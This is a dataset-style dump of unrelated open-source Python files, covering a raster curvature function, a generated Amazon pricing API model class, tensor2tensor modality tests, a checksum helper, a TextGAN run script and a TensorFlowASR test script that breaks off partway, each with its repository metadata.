[nan, -0., -1., -0., nan],
[nan, -1., 4., -1., nan],
[nan, -0., -1., -0., nan],
[nan, nan, nan, nan, nan]], dtype=float32)
Dimensions without coordinates: dim_0, dim_1
Attributes:
res: (10, 10)
"""
cellsize_x, cellsize_y = get_dataarray_resolution(agg)
cellsize = (cellsize_x + cellsize_y) / 2
mapper = ArrayTypeFunctionMapping(
numpy_func=_run_numpy,
cupy_func=_run_cupy,
dask_func=_run_dask_numpy,
dask_cupy_func=lambda *args: not_implemented_func(
*args, messages='curvature() does not support dask with cupy backed DataArray.'), # noqa
)
out = mapper(agg)(agg.data, cellsize)
return xr.DataArray(out,
name=name,
coords=agg.coords,
dims=agg.dims,
attrs=agg.attrs)
| 34.027273 | 120 | 0.558376 |
from functools import partial
from typing import Union
from typing import Optional
try:
import cupy
except ImportError:
class cupy(object):
ndarray = False
import dask.array as da
from numba import cuda
import numpy as np
import xarray as xr
from xrspatial.utils import cuda_args
from xrspatial.utils import get_dataarray_resolution
from xrspatial.utils import ngjit
from xrspatial.utils import not_implemented_func
from xrspatial.utils import ArrayTypeFunctionMapping
@ngjit
def _cpu(data, cellsize):
out = np.empty(data.shape, np.float64)
out[:] = np.nan
rows, cols = data.shape
for y in range(1, rows - 1):
for x in range(1, cols - 1):
d = (data[y + 1, x] + data[y - 1, x]) / 2 - data[y, x]
e = (data[y, x + 1] + data[y, x - 1]) / 2 - data[y, x]
out[y, x] = -2 * (d + e) * 100 / (cellsize * cellsize)
return out
def _run_numpy(data: np.ndarray,
cellsize: Union[int, float]) -> np.ndarray:
out = _cpu(data, cellsize)
return out
def _run_dask_numpy(data: da.Array,
cellsize: Union[int, float]) -> da.Array:
_func = partial(_cpu, cellsize=cellsize)
out = data.map_overlap(_func,
depth=(1, 1),
boundary=np.nan,
meta=np.array(()))
return out
@cuda.jit(device=True)
def _gpu(arr, cellsize):
d = (arr[1, 0] + arr[1, 2]) / 2 - arr[1, 1]
e = (arr[0, 1] + arr[2, 1]) / 2 - arr[1, 1]
curv = -2 * (d + e) * 100 / (cellsize[0] * cellsize[0])
return curv
@cuda.jit
def _run_gpu(arr, cellsize, out):
i, j = cuda.grid(2)
di = 1
dj = 1
if (i - di >= 0 and i + di <= out.shape[0] - 1 and
j - dj >= 0 and j + dj <= out.shape[1] - 1):
out[i, j] = _gpu(arr[i - di:i + di + 1, j - dj:j + dj + 1], cellsize)
def _run_cupy(data: cupy.ndarray,
cellsize: Union[int, float]) -> cupy.ndarray:
cellsize_arr = cupy.array([float(cellsize)], dtype='f4')
griddim, blockdim = cuda_args(data.shape)
out = cupy.empty(data.shape, dtype='f4')
out[:] = cupy.nan
_run_gpu[griddim, blockdim](data, cellsize_arr, out)
return out
def curvature(agg: xr.DataArray,
name: Optional[str] = 'curvature') -> xr.DataArray:
cellsize_x, cellsize_y = get_dataarray_resolution(agg)
cellsize = (cellsize_x + cellsize_y) / 2
mapper = ArrayTypeFunctionMapping(
numpy_func=_run_numpy,
cupy_func=_run_cupy,
dask_func=_run_dask_numpy,
dask_cupy_func=lambda *args: not_implemented_func(
*args, messages='curvature() does not support dask with cupy backed DataArray.'),
)
out = mapper(agg)(agg.data, cellsize)
return xr.DataArray(out,
name=name,
coords=agg.coords,
dims=agg.dims,
attrs=agg.attrs)
| true | true |
1c305e90a5c508127a5d8e97db379d8499158f06 | 4,203 | py | Python | sp_api/api/products/models/points.py | lionsdigitalsolutions/python-amazon-sp-api | 7374523ebc65e2e01e37d03fc4009a44fabf2c3b | [
"MIT"
] | null | null | null | sp_api/api/products/models/points.py | lionsdigitalsolutions/python-amazon-sp-api | 7374523ebc65e2e01e37d03fc4009a44fabf2c3b | [
"MIT"
] | null | null | null | sp_api/api/products/models/points.py | lionsdigitalsolutions/python-amazon-sp-api | 7374523ebc65e2e01e37d03fc4009a44fabf2c3b | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Selling Partner API for Pricing
The Selling Partner API for Pricing helps you programmatically retrieve product pricing and offer information for Amazon Marketplace products. # noqa: E501
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Points(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'points_number': 'int',
'points_monetary_value': 'MoneyType'
}
attribute_map = {
'points_number': 'PointsNumber',
'points_monetary_value': 'PointsMonetaryValue'
}
def __init__(self, points_number=None, points_monetary_value=None): # noqa: E501
"""Points - a model defined in Swagger""" # noqa: E501
self._points_number = None
self._points_monetary_value = None
self.discriminator = None
if points_number is not None:
self.points_number = points_number
if points_monetary_value is not None:
self.points_monetary_value = points_monetary_value
@property
def points_number(self):
"""Gets the points_number of this Points. # noqa: E501
The number of points. # noqa: E501
:return: The points_number of this Points. # noqa: E501
:rtype: int
"""
return self._points_number
@points_number.setter
def points_number(self, points_number):
"""Sets the points_number of this Points.
The number of points. # noqa: E501
:param points_number: The points_number of this Points. # noqa: E501
:type: int
"""
self._points_number = points_number
@property
def points_monetary_value(self):
"""Gets the points_monetary_value of this Points. # noqa: E501
:return: The points_monetary_value of this Points. # noqa: E501
:rtype: MoneyType
"""
return self._points_monetary_value
@points_monetary_value.setter
def points_monetary_value(self, points_monetary_value):
"""Sets the points_monetary_value of this Points.
:param points_monetary_value: The points_monetary_value of this Points. # noqa: E501
:type: MoneyType
"""
self._points_monetary_value = points_monetary_value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Points, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Points):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 30.021429 | 160 | 0.59743 |
import pprint
import re
import six
class Points(object):
swagger_types = {
'points_number': 'int',
'points_monetary_value': 'MoneyType'
}
attribute_map = {
'points_number': 'PointsNumber',
'points_monetary_value': 'PointsMonetaryValue'
}
def __init__(self, points_number=None, points_monetary_value=None):
self._points_number = None
self._points_monetary_value = None
self.discriminator = None
if points_number is not None:
self.points_number = points_number
if points_monetary_value is not None:
self.points_monetary_value = points_monetary_value
@property
def points_number(self):
return self._points_number
@points_number.setter
def points_number(self, points_number):
self._points_number = points_number
@property
def points_monetary_value(self):
return self._points_monetary_value
@points_monetary_value.setter
def points_monetary_value(self, points_monetary_value):
self._points_monetary_value = points_monetary_value
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Points, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, Points):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
1c305e9c9d6a42f7765d960f9d6a66a5c31f95e0 | 73 | py | Python | src/checksum.py | cmolinaord/bimug_drone | f263207125fd49a772b7deeccee2e54ffd88e3d9 | [
"MIT"
] | null | null | null | src/checksum.py | cmolinaord/bimug_drone | f263207125fd49a772b7deeccee2e54ffd88e3d9 | [
"MIT"
] | null | null | null | src/checksum.py | cmolinaord/bimug_drone | f263207125fd49a772b7deeccee2e54ffd88e3d9 | [
"MIT"
] | null | null | null | def checksum(str):
c = 0
for s in str:
c = c ^ ord(s)
return hex(c)
| 12.166667 | 18 | 0.561644 | def checksum(str):
c = 0
for s in str:
c = c ^ ord(s)
return hex(c)
| true | true |
1c305eb2aa507e845aefc969185000164f9214bf | 26 | py | Python | lztools/enums/RemoteTool.py | Zanzes/lztools | 4091416464cbb441f5af26ade6a03ff18ae1bf01 | [
"MIT"
] | null | null | null | lztools/enums/RemoteTool.py | Zanzes/lztools | 4091416464cbb441f5af26ade6a03ff18ae1bf01 | [
"MIT"
] | null | null | null | lztools/enums/RemoteTool.py | Zanzes/lztools | 4091416464cbb441f5af26ade6a03ff18ae1bf01 | [
"MIT"
] | null | null | null | IdentifyOS = "identify_os" | 26 | 26 | 0.807692 | IdentifyOS = "identify_os" | true | true |
1c305ed176e0c14f937447f3722fb2006126a9d6 | 4,682 | py | Python | tensor2tensor/layers/modalities_test.py | sivaramakrishna7/tensor2tensor | eb0118d3f459913133e3d68a96944480a928bff1 | [
"Apache-2.0"
] | 5 | 2019-03-28T03:52:32.000Z | 2021-02-24T07:09:26.000Z | tensor2tensor/layers/modalities_test.py | sivaramakrishna7/tensor2tensor | eb0118d3f459913133e3d68a96944480a928bff1 | [
"Apache-2.0"
] | null | null | null | tensor2tensor/layers/modalities_test.py | sivaramakrishna7/tensor2tensor | eb0118d3f459913133e3d68a96944480a928bff1 | [
"Apache-2.0"
] | 2 | 2018-08-07T03:43:09.000Z | 2019-12-09T06:41:40.000Z | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Modalities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import modalities
from tensor2tensor.utils import expert_utils
import tensorflow as tf
class ModalityTest(tf.test.TestCase):
def testSymbolModalityInputs(self):
batch_size = 10
num_datashards = 5
length = 5
vocab_size = 5000
hidden_size = 9
model_hparams = common_hparams.basic_params1()
model_hparams.hidden_size = hidden_size
model_hparams.mode = tf.estimator.ModeKeys.TRAIN
x = -1 + np.random.random_integers(
vocab_size, size=(batch_size, length, 1, 1))
m = modalities.SymbolModality(model_hparams, vocab_size)
data_parallelism = expert_utils.Parallelism(
["/device:CPU:0"] * num_datashards)
with self.test_session() as session:
xs = tf.split(x, num_datashards)
sharded_output = m.bottom_sharded(xs, data_parallelism)
output = tf.concat(sharded_output, 0)
session.run(tf.global_variables_initializer())
res = session.run(output)
self.assertEqual(res.shape, (batch_size, length, 1, hidden_size))
def testSymbolModalityTargets(self):
batch_size = 10
num_datashards = 5
length = 6
height = 7
hidden_size = 9
vocab_size = 11
model_hparams = common_hparams.basic_params1()
model_hparams.hidden_size = hidden_size
model_hparams.mode = tf.estimator.ModeKeys.TRAIN
body_output = -1 + np.random.random_integers(
100, size=(batch_size, length, height, hidden_size))
targets = -1 + np.random.random_integers(
vocab_size, size=(batch_size, length, height, 1))
m = modalities.SymbolModality(model_hparams, vocab_size)
data_parallelism = expert_utils.Parallelism(
["/device:CPU:0"] * num_datashards)
with self.test_session() as session:
sharded_body_output = tf.split(tf.to_float(body_output), num_datashards)
sharded_targets = tf.split(targets, num_datashards)
sharded_logits = m.top_sharded(sharded_body_output, sharded_targets,
data_parallelism)
train_loss = m.loss_sharded(sharded_logits, sharded_targets,
data_parallelism)
logits = tf.concat(sharded_logits, 0)
session.run(tf.global_variables_initializer())
res1, res2 = session.run((logits, train_loss))
self.assertEqual(res1.shape, (batch_size, length, height, 1, vocab_size))
self.assertEqual(res2.shape, ())
def testSymbolModalityTargetsFactored(self):
batch_size = 10
num_datashards = 5
length = 6
height = 7
hidden_size = 9
vocab_size = 11
model_hparams = common_hparams.basic_params1()
model_hparams.factored_logits = True
model_hparams.hidden_size = hidden_size
model_hparams.mode = tf.estimator.ModeKeys.TRAIN
body_output = -1 + np.random.random_integers(
100, size=(batch_size, length, height, hidden_size))
targets = -1 + np.random.random_integers(
vocab_size, size=(batch_size, length, height, 1))
m = modalities.SymbolModality(model_hparams, vocab_size)
data_parallelism = expert_utils.Parallelism(
["/device:CPU:0"] * num_datashards)
with self.test_session() as session:
sharded_body_output = tf.split(tf.to_float(body_output), num_datashards)
sharded_targets = tf.split(targets, num_datashards)
sharded_logits = m.top_sharded(sharded_body_output, sharded_targets,
data_parallelism)
train_loss = m.loss_sharded(sharded_logits, sharded_targets,
data_parallelism)
logits = tf.concat(sharded_logits, 0)
session.run(tf.global_variables_initializer())
res1, res2 = session.run((logits, train_loss))
self.assertEqual(res1.shape, (batch_size, length, height, 1, vocab_size))
self.assertEqual(res2.shape, ())
if __name__ == "__main__":
tf.test.main()
| 39.016667 | 78 | 0.709099 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import modalities
from tensor2tensor.utils import expert_utils
import tensorflow as tf
class ModalityTest(tf.test.TestCase):
def testSymbolModalityInputs(self):
batch_size = 10
num_datashards = 5
length = 5
vocab_size = 5000
hidden_size = 9
model_hparams = common_hparams.basic_params1()
model_hparams.hidden_size = hidden_size
model_hparams.mode = tf.estimator.ModeKeys.TRAIN
x = -1 + np.random.random_integers(
vocab_size, size=(batch_size, length, 1, 1))
m = modalities.SymbolModality(model_hparams, vocab_size)
data_parallelism = expert_utils.Parallelism(
["/device:CPU:0"] * num_datashards)
with self.test_session() as session:
xs = tf.split(x, num_datashards)
sharded_output = m.bottom_sharded(xs, data_parallelism)
output = tf.concat(sharded_output, 0)
session.run(tf.global_variables_initializer())
res = session.run(output)
self.assertEqual(res.shape, (batch_size, length, 1, hidden_size))
def testSymbolModalityTargets(self):
batch_size = 10
num_datashards = 5
length = 6
height = 7
hidden_size = 9
vocab_size = 11
model_hparams = common_hparams.basic_params1()
model_hparams.hidden_size = hidden_size
model_hparams.mode = tf.estimator.ModeKeys.TRAIN
body_output = -1 + np.random.random_integers(
100, size=(batch_size, length, height, hidden_size))
targets = -1 + np.random.random_integers(
vocab_size, size=(batch_size, length, height, 1))
m = modalities.SymbolModality(model_hparams, vocab_size)
data_parallelism = expert_utils.Parallelism(
["/device:CPU:0"] * num_datashards)
with self.test_session() as session:
sharded_body_output = tf.split(tf.to_float(body_output), num_datashards)
sharded_targets = tf.split(targets, num_datashards)
sharded_logits = m.top_sharded(sharded_body_output, sharded_targets,
data_parallelism)
train_loss = m.loss_sharded(sharded_logits, sharded_targets,
data_parallelism)
logits = tf.concat(sharded_logits, 0)
session.run(tf.global_variables_initializer())
res1, res2 = session.run((logits, train_loss))
self.assertEqual(res1.shape, (batch_size, length, height, 1, vocab_size))
self.assertEqual(res2.shape, ())
def testSymbolModalityTargetsFactored(self):
batch_size = 10
num_datashards = 5
length = 6
height = 7
hidden_size = 9
vocab_size = 11
model_hparams = common_hparams.basic_params1()
model_hparams.factored_logits = True
model_hparams.hidden_size = hidden_size
model_hparams.mode = tf.estimator.ModeKeys.TRAIN
body_output = -1 + np.random.random_integers(
100, size=(batch_size, length, height, hidden_size))
targets = -1 + np.random.random_integers(
vocab_size, size=(batch_size, length, height, 1))
m = modalities.SymbolModality(model_hparams, vocab_size)
data_parallelism = expert_utils.Parallelism(
["/device:CPU:0"] * num_datashards)
with self.test_session() as session:
sharded_body_output = tf.split(tf.to_float(body_output), num_datashards)
sharded_targets = tf.split(targets, num_datashards)
sharded_logits = m.top_sharded(sharded_body_output, sharded_targets,
data_parallelism)
train_loss = m.loss_sharded(sharded_logits, sharded_targets,
data_parallelism)
logits = tf.concat(sharded_logits, 0)
session.run(tf.global_variables_initializer())
res1, res2 = session.run((logits, train_loss))
self.assertEqual(res1.shape, (batch_size, length, height, 1, vocab_size))
self.assertEqual(res2.shape, ())
if __name__ == "__main__":
tf.test.main()
| true | true |
1c305f188374ce49ca2ce60915aa41c9f776411f | 1,145 | py | Python | game/views.py | nfielder/zero-score-game | 61433e4348cc6dbfbe137901da08f896cd2afa58 | [
"MIT"
] | null | null | null | game/views.py | nfielder/zero-score-game | 61433e4348cc6dbfbe137901da08f896cd2afa58 | [
"MIT"
] | 6 | 2021-03-19T07:21:06.000Z | 2021-09-23T06:22:05.000Z | game/views.py | nfielder/zero-score-game | 61433e4348cc6dbfbe137901da08f896cd2afa58 | [
"MIT"
] | null | null | null | from django.shortcuts import get_object_or_404, render
from django.http import HttpResponse
from django.views import generic
from .models import Quiz, Question, Answer
class IndexView(generic.ListView):
template_name = 'game/index.html'
def get_queryset(self):
"""Return all quizzes."""
return Quiz.objects.all()
class QuizView(generic.ListView):
template_name = 'game/quiz.html'
def get_queryset(self):
return Question.objects.filter(quiz=self.kwargs['pk'])
class QuestionView(generic.DetailView):
model = Question
template_name = 'game/question.html'
def outcome(request, question_id):
question = get_object_or_404(Question, pk=question_id)
inputted_answer = request.POST['answer'].lower()
correct_answers_set = question.answer_set.all()
correct_answers = [{x.answer_text.lower(): x.score}
for x in correct_answers_set]
for x in correct_answers:
if inputted_answer in x.keys():
return render(request, 'game/outcome.html', {'score': x[inputted_answer]})
return render(request, 'game/outcome.html', {'score': 'WRONG'})
| 30.131579 | 86 | 0.699563 | from django.shortcuts import get_object_or_404, render
from django.http import HttpResponse
from django.views import generic
from .models import Quiz, Question, Answer
class IndexView(generic.ListView):
template_name = 'game/index.html'
def get_queryset(self):
return Quiz.objects.all()
class QuizView(generic.ListView):
template_name = 'game/quiz.html'
def get_queryset(self):
return Question.objects.filter(quiz=self.kwargs['pk'])
class QuestionView(generic.DetailView):
model = Question
template_name = 'game/question.html'
def outcome(request, question_id):
question = get_object_or_404(Question, pk=question_id)
inputted_answer = request.POST['answer'].lower()
correct_answers_set = question.answer_set.all()
correct_answers = [{x.answer_text.lower(): x.score}
for x in correct_answers_set]
for x in correct_answers:
if inputted_answer in x.keys():
return render(request, 'game/outcome.html', {'score': x[inputted_answer]})
return render(request, 'game/outcome.html', {'score': 'WRONG'})
| true | true |
1c305f48451238b0c7e8bd931f7965ead76b5b64 | 163 | py | Python | bin/cubes/pentacubes-octagonal-frame-1.py | tiwo/puzzler | 7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e | [
"Intel"
] | null | null | null | bin/cubes/pentacubes-octagonal-frame-1.py | tiwo/puzzler | 7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e | [
"Intel"
] | null | null | null | bin/cubes/pentacubes-octagonal-frame-1.py | tiwo/puzzler | 7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e | [
"Intel"
] | 1 | 2022-01-02T16:54:14.000Z | 2022-01-02T16:54:14.000Z | #!/usr/bin/env python
# $Id$
"""many solutions"""
import puzzler
from puzzler.puzzles.pentacubes import PentacubesOctagonalFrame1 as puzzle
puzzler.run(puzzle)
| 16.3 | 74 | 0.773006 |
import puzzler
from puzzler.puzzles.pentacubes import PentacubesOctagonalFrame1 as puzzle
puzzler.run(puzzle)
| true | true |
1c3060cbc2ffeea68a73ad257f383f7121f03ac3 | 3,479 | py | Python | run/run_dpgan.py | vab10266/VaudsTextGans | 7b2e32b13cc4e03d12a0bd9753beee7c20c94d01 | [
"MIT"
] | null | null | null | run/run_dpgan.py | vab10266/VaudsTextGans | 7b2e32b13cc4e03d12a0bd9753beee7c20c94d01 | [
"MIT"
] | null | null | null | run/run_dpgan.py | vab10266/VaudsTextGans | 7b2e32b13cc4e03d12a0bd9753beee7c20c94d01 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# @Author : William
# @Project : TextGAN-william
# @FileName : run_seqgan.py
# @Time : Created at 2019-05-27
# @Blog : http://zhiweil.ml/
# @Description :
# Copyrights (C) 2018. All Rights Reserved.
import sys
from subprocess import call
import os
# Job id and gpu_id
if len(sys.argv) > 2:
job_id = int(sys.argv[1])
gpu_id = str(sys.argv[2])
print('job_id: {}, gpu_id: {}'.format(job_id, gpu_id))
elif len(sys.argv) > 1:
job_id = int(sys.argv[1])
gpu_id = 0
print('job_id: {}, missing gpu_id (use default {})'.format(job_id, gpu_id))
else:
job_id = 0
gpu_id = 2
print('Missing argument: job_id and gpu_id. Use default job_id: {}, gpu_id: {}'.format(job_id, gpu_id))
# Executables
executable = 'C:\\Users\\vauda\\anaconda3\\python.exe' # specify your own python interpreter path here
rootdir = '../'
scriptname = 'main.py'
# ===Program===
if_test = int(False)
run_model = 'dpgan'
CUDA = int(True)
oracle_pretrain = int(True)
gen_pretrain = int(False)
dis_pretrain = int(False)
MLE_train_epoch = 120
ADV_train_epoch = 200
tips = 'DPGAN experiments'
# ===Oracle or Real===
if_real_data = [int(False), int(True), int(True), int(True)]
dataset = ['oracle', 'image_coco', 'amazon_app_book', 'emnlp_news']
vocab_size = [5000, 0, 0]
# ===Basic Param===
data_shuffle = int(False)
model_type = 'vanilla'
gen_init = 'normal'
dis_init = 'uniform'
samples_num = 10000
batch_size = 64
max_seq_len = 20
gen_lr = 0.01
dis_lr = 0.01
pre_log_step = 10
adv_log_step = 1
# ===Generator===
ADV_g_step = 1
rollout_num = 16
gen_embed_dim = 32
gen_hidden_dim = 32
# ===Discriminator===
d_step = 5
d_epoch = 3
ADV_d_step = 4
ADV_d_epoch = 2
dis_embed_dim = 64
dis_hidden_dim = 64
# ===Metrics===
use_nll_oracle = int(True)
use_nll_gen = int(True)
use_nll_div = int(True)
use_bleu = int(True)
use_self_bleu = int(False)
use_ppl = int(False)
args = [
# Program
'--if_test', if_test,
'--run_model', run_model,
'--cuda', CUDA,
'--device', gpu_id, # comment for auto GPU
'--ora_pretrain', oracle_pretrain,
'--gen_pretrain', gen_pretrain,
'--dis_pretrain', dis_pretrain,
'--mle_epoch', MLE_train_epoch,
'--adv_epoch', ADV_train_epoch,
'--tips', tips,
# Oracle or Real
'--if_real_data', if_real_data[job_id],
'--dataset', dataset[job_id],
'--vocab_size', vocab_size[job_id],
# Basic Param
'--shuffle', data_shuffle,
'--model_type', model_type,
'--gen_init', gen_init,
'--dis_init', dis_init,
'--samples_num', samples_num,
'--batch_size', batch_size,
'--max_seq_len', max_seq_len,
'--gen_lr', gen_lr,
'--dis_lr', dis_lr,
'--pre_log_step', pre_log_step,
'--adv_log_step', adv_log_step,
# Generator
'--adv_g_step', ADV_g_step,
'--rollout_num', rollout_num,
'--gen_embed_dim', gen_embed_dim,
'--gen_hidden_dim', gen_hidden_dim,
# Discriminator
'--d_step', d_step,
'--d_epoch', d_epoch,
'--adv_d_step', ADV_d_step,
'--adv_d_epoch', ADV_d_epoch,
'--dis_embed_dim', dis_embed_dim,
'--dis_hidden_dim', dis_hidden_dim,
# Metrics
'--use_nll_oracle', use_nll_oracle,
'--use_nll_gen', use_nll_gen,
'--use_nll_div', use_nll_div,
'--use_bleu', use_bleu,
'--use_self_bleu', use_self_bleu,
'--use_ppl', use_ppl,
]
args = list(map(str, args))
my_env = os.environ.copy()
call([executable, scriptname] + args, env=my_env, cwd=rootdir)
| 24.5 | 107 | 0.649037 |
import sys
from subprocess import call
import os
if len(sys.argv) > 2:
job_id = int(sys.argv[1])
gpu_id = str(sys.argv[2])
print('job_id: {}, gpu_id: {}'.format(job_id, gpu_id))
elif len(sys.argv) > 1:
job_id = int(sys.argv[1])
gpu_id = 0
print('job_id: {}, missing gpu_id (use default {})'.format(job_id, gpu_id))
else:
job_id = 0
gpu_id = 2
print('Missing argument: job_id and gpu_id. Use default job_id: {}, gpu_id: {}'.format(job_id, gpu_id))
executable = 'C:\\Users\\vauda\\anaconda3\\python.exe'
rootdir = '../'
scriptname = 'main.py'
if_test = int(False)
run_model = 'dpgan'
CUDA = int(True)
oracle_pretrain = int(True)
gen_pretrain = int(False)
dis_pretrain = int(False)
MLE_train_epoch = 120
ADV_train_epoch = 200
tips = 'DPGAN experiments'
if_real_data = [int(False), int(True), int(True), int(True)]
dataset = ['oracle', 'image_coco', 'amazon_app_book', 'emnlp_news']
vocab_size = [5000, 0, 0]
data_shuffle = int(False)
model_type = 'vanilla'
gen_init = 'normal'
dis_init = 'uniform'
samples_num = 10000
batch_size = 64
max_seq_len = 20
gen_lr = 0.01
dis_lr = 0.01
pre_log_step = 10
adv_log_step = 1
ADV_g_step = 1
rollout_num = 16
gen_embed_dim = 32
gen_hidden_dim = 32
d_step = 5
d_epoch = 3
ADV_d_step = 4
ADV_d_epoch = 2
dis_embed_dim = 64
dis_hidden_dim = 64
use_nll_oracle = int(True)
use_nll_gen = int(True)
use_nll_div = int(True)
use_bleu = int(True)
use_self_bleu = int(False)
use_ppl = int(False)
args = [
'--if_test', if_test,
'--run_model', run_model,
'--cuda', CUDA,
'--device', gpu_id,
'--ora_pretrain', oracle_pretrain,
'--gen_pretrain', gen_pretrain,
'--dis_pretrain', dis_pretrain,
'--mle_epoch', MLE_train_epoch,
'--adv_epoch', ADV_train_epoch,
'--tips', tips,
'--if_real_data', if_real_data[job_id],
'--dataset', dataset[job_id],
'--vocab_size', vocab_size[job_id],
'--shuffle', data_shuffle,
'--model_type', model_type,
'--gen_init', gen_init,
'--dis_init', dis_init,
'--samples_num', samples_num,
'--batch_size', batch_size,
'--max_seq_len', max_seq_len,
'--gen_lr', gen_lr,
'--dis_lr', dis_lr,
'--pre_log_step', pre_log_step,
'--adv_log_step', adv_log_step,
'--adv_g_step', ADV_g_step,
'--rollout_num', rollout_num,
'--gen_embed_dim', gen_embed_dim,
'--gen_hidden_dim', gen_hidden_dim,
'--d_step', d_step,
'--d_epoch', d_epoch,
'--adv_d_step', ADV_d_step,
'--adv_d_epoch', ADV_d_epoch,
'--dis_embed_dim', dis_embed_dim,
'--dis_hidden_dim', dis_hidden_dim,
'--use_nll_oracle', use_nll_oracle,
'--use_nll_gen', use_nll_gen,
'--use_nll_div', use_nll_div,
'--use_bleu', use_bleu,
'--use_self_bleu', use_self_bleu,
'--use_ppl', use_ppl,
]
args = list(map(str, args))
my_env = os.environ.copy()
call([executable, scriptname] + args, env=my_env, cwd=rootdir)
| true | true |
1c30615b4a746379de40cc792bf7d00df1e3b945 | 4,068 | py | Python | examples/streaming_transducer/test_subword_streaming_transducer.py | Honghe/TensorFlowASR | ade78916987b6a61642b650cc10d259aeeb1d92e | [
"Apache-2.0"
] | 1 | 2020-10-20T11:42:08.000Z | 2020-10-20T11:42:08.000Z | examples/streaming_transducer/test_subword_streaming_transducer.py | dathudeptrai/TensorFlowASR | 72cd5d2b932d66ddd61e79ab41bb0d64cb8c4919 | [
"Apache-2.0"
] | null | null | null | examples/streaming_transducer/test_subword_streaming_transducer.py | dathudeptrai/TensorFlowASR | 72cd5d2b932d66ddd61e79ab41bb0d64cb8c4919 | [
"Apache-2.0"
] | 1 | 2021-10-16T22:40:42.000Z | 2021-10-16T22:40:42.000Z | # Copyright 2020 Huy Le Nguyen (@usimarit)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import argparse
from tensorflow_asr.utils import setup_environment, setup_devices
setup_environment()
import tensorflow as tf
DEFAULT_YAML = os.path.join(os.path.abspath(os.path.dirname(__file__)), "config.yml")
tf.keras.backend.clear_session()
parser = argparse.ArgumentParser(prog="Conformer Testing")
parser.add_argument("--config", type=str, default=DEFAULT_YAML,
help="The file path of model configuration file")
parser.add_argument("--saved", type=str, default=None,
help="Path to saved model")
parser.add_argument("--tfrecords", default=False, action="store_true",
help="Whether to use tfrecords as dataset")
parser.add_argument("--mxp", default=False, action="store_true",
help="Enable mixed precision")
parser.add_argument("--device", type=int, default=0,
help="Device's id to run test on")
parser.add_argument("--cpu", default=False, action="store_true",
help="Whether to only use cpu")
parser.add_argument("--subwords", type=str, default=None,
help="Path to file that stores generated subwords")
parser.add_argument("--output_name", type=str, default="test",
help="Result filename name prefix")
args = parser.parse_args()
tf.config.optimizer.set_experimental_options({"auto_mixed_precision": args.mxp})
setup_devices([args.device], cpu=args.cpu)
from tensorflow_asr.configs.user_config import UserConfig
from tensorflow_asr.datasets.asr_dataset import ASRTFRecordDataset, ASRSliceDataset
from tensorflow_asr.featurizers.speech_featurizers import TFSpeechFeaturizer
from tensorflow_asr.featurizers.text_featurizers import SubwordFeaturizer
from tensorflow_asr.runners.base_runners import BaseTester
from tensorflow_asr.models.streaming_transducer import StreamingTransducer
config = UserConfig(DEFAULT_YAML, args.config, learning=True)
speech_featurizer = TFSpeechFeaturizer(config["speech_config"])
if args.subwords and os.path.exists(args.subwords):
print("Loading subwords ...")
text_featurizer = SubwordFeaturizer.load_from_file(config["decoder_config"], args.subwords)
else:
raise ValueError("subwords must be set")
tf.random.set_seed(0)
assert args.saved
if args.tfrecords:
test_dataset = ASRTFRecordDataset(
data_paths=config["learning_config"]["dataset_config"]["test_paths"],
tfrecords_dir=config["learning_config"]["dataset_config"]["tfrecords_dir"],
speech_featurizer=speech_featurizer,
text_featurizer=text_featurizer,
stage="test", shuffle=False
)
